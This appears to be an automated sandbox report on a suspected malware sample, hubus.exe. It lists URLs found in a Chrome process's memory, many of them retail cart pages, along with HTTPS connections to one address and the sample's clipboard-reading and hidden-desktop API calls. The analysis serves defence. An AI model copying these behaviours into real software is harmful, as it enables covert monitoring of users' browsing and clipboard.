                          Source: chrome.exe, 00000002.00000003.12116608328.00002D2402C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
                          Source: chrome.exe, 00000002.00000002.12200683804.00002D2403A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CH
                          Source: chrome.exe, 00000002.00000002.12186392208.00002D2402230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
                          Source: chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                          Source: chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                          Source: chrome.exe, 00000002.00000003.12116608328.00002D2402C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
                          Source: chrome.exe, 00000002.00000003.12122661704.00002D2402790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12189824344.00002D2402794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120697065.00002D2402790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195167249.00002D2403050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12122529790.00002D240278C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=adobe
                          Source: chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=at
                          Source: chrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196931582.00002D2403374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=autoit
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=bios320.exe
                          Source: chrome.exe, 00000002.00000002.12197335639.00002D2403414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198552768.00002D2403604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
                          Source: chrome.exe, 00000002.00000002.12187640716.00002D2402390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186742001.00002D2402290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195116163.00002D2403038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=firefox
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196931582.00002D2403374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=java
                          Source: chrome.exe, 00000002.00000002.12194459600.00002D2402EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196171828.00002D2403258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=testzentrum
                          Source: chrome.exe, 00000002.00000002.12194459600.00002D2402EF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKX
                          Source: chrome.exe, 00000002.00000002.12189152164.00002D240264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116707032.00002D240264C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                          Source: chrome.exe, 00000002.00000002.12190418549.00002D2402920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com:443
                          Source: chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                          Source: chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida
                          Source: chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida-
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                          Source: chrome.exe, 00000002.00000002.12199412317.00002D240389C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupon.com/cart
                          Source: chrome.exe, 00000002.00000002.12199412317.00002D240389C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                          Source: chrome.exe, 00000002.00000002.12190783090.00002D2402994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                          Source: chrome.exe, 00000002.00000002.12191138758.00002D2402A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.guitarcenter.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.harborfreight.com/checkout/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hmhco.com/hmhstorefront/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homedepot.com/mycart/home
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homesquare.com/Checkout/Cart.aspx
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hottopic.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hsn.com/checkout/bag
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ikea.com/us/en/shoppingcart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcpenney.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcrew.com/checkout/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.joann.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.landsend.com/shopping-bag/
                          Source: chrome.exe, 00000002.00000002.12189891160.00002D24027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lowes.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lulus.com/checkout/bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.macys.com/my-bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.midwayusa.com/cart
                          Source: chrome.exe, 00000002.00000002.12187924452.00002D24023C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: chrome.exe, 00000002.00000002.12187924452.00002D24023C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release$
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release1.2.164946
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
                          Source: chrome.exe, 00000002.00000002.12196171828.00002D2403258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/#
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0B
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/ODownload
                          Source: chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/e
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nike.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nordstrom.com/shopping-bag
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setup
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.opticsplanet.com/checkout/cart
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/search/results
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.otterbox.com/en-us/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.overstock.com/cart
                          Source: chrome.exe, 00000002.00000002.12192151460.00002D2402AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.petsmart.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pier1.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pokemoncenter.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.potterybarn.com/shoppingcart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qvc.com/checkout/cart.html
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.redbubble.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rei.com/ShoppingCart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rockauto.com/en/cart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.saksfifthavenue.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.samsclub.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sephora.com/basket
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.shutterfly.com/cart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.staples.com/cc/mmx/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sweetwater.com/store/cart.php
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.talbots.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.target.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.teacherspayteachers.com/Cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.therealreal.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ulta.com/bag
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.underarmour.com/en-us/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.urbanoutfitters.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vitalsource.com/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walgreens.com/cart/view-ui
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walmart.com/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wayfair.com/v/checkout/basket/show
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.westelm.com/shoppingcart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wiley.com/en-us/cart
                          Source: chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.williams-sonoma.com/shoppingcart/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wish.com/cart
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197201532.00002D24033CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197201532.00002D24033CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zappos.com/cart
                          Source: chrome.exe, 00000002.00000002.12191138758.00002D2402A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zazzle.com/co/cart
                          Source: chrome.exe, 00000002.00000002.12191138758.00002D2402A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zennioptical.com/shoppingCart
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www2.hm.com/en_us/cart
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youronlinechoices.eu
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49760 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49761 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49763 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49764 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49765 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49766 version: TLS 1.2
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00432BE0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_00432BE0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00432BE0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_00432BE0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0041BBE0 CreateDesktopW,1_2_0041BBE0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E5DC480_2_02E5DC48
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E50DA00_2_02E50DA0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_02E5A5400_2_02E5A540
